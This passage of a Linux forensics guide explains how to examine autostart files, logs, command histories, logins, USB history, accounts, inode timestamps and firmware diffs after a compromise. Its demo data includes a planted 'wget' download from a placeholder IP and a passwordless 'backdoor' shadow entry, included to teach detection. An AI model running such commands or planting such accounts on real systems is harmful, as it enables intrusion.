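# Dump every autostart candidate that exists, tagged with its path.
for f in "$MNT"/home/*/.bashrc "$MNT"/home/*/.bash_profile "$MNT"/home/*/.profile \
         "$MNT"/home/*/.config/autostart/* "$MNT"/etc/rc.local; do
    [ -f "$f" ] && { echo "== $f =="; cat "$f"; }
done
```

Anything launching binaries from unusual paths (`/tmp`, `/dev/shm`, hidden directories) deserves a closer look.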
# Examine Logs

Look in all available log files on the compromised system for traces of malicious execution and associated activities, such as the creation of a new service.

## Pure Logs

**Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\
Interesting system logons:
Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. In fact, because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out-of-order entries that might be an indication of deletion or tampering.
{% endhint %}
## Command History

Many Linux systems are configured to maintain a command history for each user account:

* \~/.sh\_history
* \~/.\*\_history
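On a mounted image, those per-account history files can be collected with a single `find`. This is a sketch over fabricated demo data; `MNT` is an assumed mount point, and the planted commands are illustrative only.

```bash
MNT=/tmp/demo_hist_root          # assumed mount point of the subject filesystem
mkdir -p "$MNT/home/alice" "$MNT/root"
echo 'wget http://203.0.113.5/x.sh' > "$MNT/home/alice/.bash_history"  # demo data
echo 'chattr +i /tmp/.hidden'       > "$MNT/root/.sh_history"          # demo data

# Print every dot-history file, prefixed with the path it came from.
find "$MNT" -maxdepth 3 -name '.*history' -type f | while read -r f; do
    echo "== $f =="
    cat "$f"
done
```

Downloads, compiler invocations, and permission changes in a history file often mark the moment of compromise.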
## Logins

Using the command `last -Faiwx` it's possible to get the list of users that have logged in.\
It's recommended to check if those logins make sense:

This is important as **attackers** sometimes may copy `/bin/bash` inside `/bin/false`, so accounts that are supposed to have no shell may be **able to log in**.

Note that you can also **review this information by reading the logs**.
## Application Traces

* **SSH**: Connections to systems made using SSH to and from a compromised system result in entries being made in files for each user account (_**\~/.ssh/authorized\_keys**_ and _**\~/.ssh/known\_hosts**_). These entries can reveal the hostname or IP address of the remote hosts.
* **Gnome Desktop**: User accounts may have a _**\~/.recently-used.xbel**_ file that contains information about files that were recently accessed using applications running in the Gnome desktop.
* **MySQL**: User accounts may have a _**\~/.mysql\_history**_ file that contains queries executed using MySQL.
* **Less**: User accounts may have a _**\~/.lesshst**_ file that contains details about the use of less, including search string history and shell commands executed via less.
## USB Logs

[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) to construct USB event history tables.

It is interesting to **know all the USBs that have been used**, and it will be even more useful if you have an authorized list of USB devices, to find "violation events" (the use of USBs that aren't inside that list).
## Installation

```
pip3 install usbrip
usbrip ids download #Download the USB ID database
```
## Examples

```
usbrip events history #Get USB history of your current linux machine
usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
```

More examples and info in the GitHub repo: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
# Review User Accounts and Logon Activities

Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check for possible sudo brute-force attacks.\
Moreover, check files like _**/etc/sudoers**_ and _**/etc/group**_ for unexpected privileges given to users.\
Finally, look for accounts with **no passwords** or **easily guessed** passwords.
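For the "no passwords" check, an empty second field in a shadow entry means the account can authenticate without a password. A minimal sketch against a fabricated sample file (never run this against live evidence; the entries below are invented):

```bash
# Fabricated shadow-style sample; the "backdoor" entry has an empty password field.
cat > /tmp/demo_shadow <<'EOF'
root:$6$salt$fakehash:19000:0:99999:7:::
backdoor::19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
EOF

# Accounts whose password field is empty can log in with no password.
awk -F: '($2 == "") {print $1}' /tmp/demo_shadow   # -> backdoor
```

Fields of `*` or `!` are locked accounts and are fine; only a truly empty field is the red flag.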
# Examine File System

File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of the **malware**.\
**Malware** is increasingly being designed to **thwart file system analysis**. Some malware alters date-time stamps on malicious files to make them harder to find with timeline analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system.

You can check the inodes of the files inside a folder using `ls -lai /bin | sort -n`

Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modified at the **same time** as the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**.
{% endhint %}
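The inode trick can be illustrated with throwaway files: even if an attacker clones a neighbour's timestamps with `touch -r`, the newcomer's inode number usually stands out. This is a sketch only; inode allocation is filesystem-dependent, so treat the ordering as a heuristic, not proof.

```bash
d=/tmp/demo_inodes
rm -rf "$d"; mkdir -p "$d"
touch "$d/ls" "$d/cat" "$d/ps"        # "original" binaries, created together
touch "$d/backdoor"                   # planted later
touch -r "$d/ls" "$d/backdoor"        # attacker clones a legitimate timestamp

# Timestamps now match, but sorting by inode still exposes the late arrival.
ls -lai "$d" | sort -n
```

In a real case you would run this against a directory like `/bin` on the read-only mounted image.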
# Compare files of different filesystem versions

### Find added files

```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
```

### Find modified content

```bash
git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time"
```

### Find deleted files

```bash
git diff --no-index --diff-filter=D _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
```
### Other filters

**`--diff-filter=[(A|C|D|M|R|T|U|X|B)…[*]]`**

Also, **these upper-case letters can be downcased to exclude**. E.g. `--diff-filter=ad` excludes added and deleted paths.

Note that not all diffs can feature all types. For instance, diffs from the index to the working tree can never have Added entries (because the set of paths included in the diff is limited by what is in the index). Similarly, copied and renamed entries cannot appear if detection for those types is disabled.
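The behaviour of those filters can be checked with two throwaway directories (a self-contained sketch; the names are arbitrary):

```bash
old=/tmp/demo_fw_old; new=/tmp/demo_fw_new
rm -rf "$old" "$new"; mkdir -p "$old" "$new"
echo same > "$old/unchanged";  echo same > "$new/unchanged"
echo v1   > "$old/config";     echo v2   > "$new/config"    # Modified
echo bye  > "$old/removed"                                  # Deleted
echo hi   > "$new/planted"                                  # Added

# git diff exits 1 when differences exist, so ignore the status here.
git diff --no-index --diff-filter=A --name-only "$old" "$new" || true  # lists the added file
git diff --no-index --diff-filter=D --name-only "$old" "$new" || true  # lists the deleted file
git diff --no-index --diff-filter=M --name-only "$old" "$new" || true  # lists the modified file
```

The same invocation scales to two extracted firmware trees, as in the squashfs examples above.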
# References

* [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf)
* [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)